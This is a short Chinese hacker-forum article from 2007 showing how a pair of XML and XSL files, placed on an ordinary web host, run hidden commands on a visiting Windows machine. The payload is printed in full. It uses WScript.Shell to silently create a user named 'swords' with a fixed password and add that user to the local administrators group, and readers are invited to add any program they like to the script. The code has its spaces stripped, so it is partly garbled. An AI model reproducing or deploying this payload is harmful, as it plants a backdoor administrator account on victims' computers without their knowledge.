利用xml+xsl给客户机添加超级管理帐户

www.hx99.org 阅读: 时间:2007-07-09 整理:华西黑盟
------------------------------------------------------------------

 

用法：把swords.xml和swords.xsl放在一个普通空间，相信很少人会注意xml的安全性吧，嘎嘎，只要把你想运行的程序添加到run()即可，默认支持js和vbs.
这个程序加了一个用户为swords，密码为est的超级管理员账号。

swords.xml

<?xmlversion="1.0"encoding="GB2312"?>
<?xml-stylesheettype="text/xsl"href="swords.xsl"?>
<name>Iamswords,Iamadmin!</name>

swords.xsl

<?xmlversion="1.0"encoding="gb2312"?>
<xsl:stylesheetxmlns:xsl="">
<xsl:templatematch="/">
<html>
<body>
<xsl:value-ofselect="name"/>
<xsl:script>
functionrun()
{
varwsh;
varwsh=newActiveXObject("WScript.Shell");
wsh.run("netuserswordsest/add",0);
wsh.run("netlocalgroupadministratorsswords/add",0);
wsh.run("cmd.exe/cechotest!");
}
</xsl:script>
<xsl:eval>run()</xsl:eval>
</body>
</html>
</xsl:template>
</xsl:stylesheet>

【免费加入会员】【我要投稿】【关闭本页】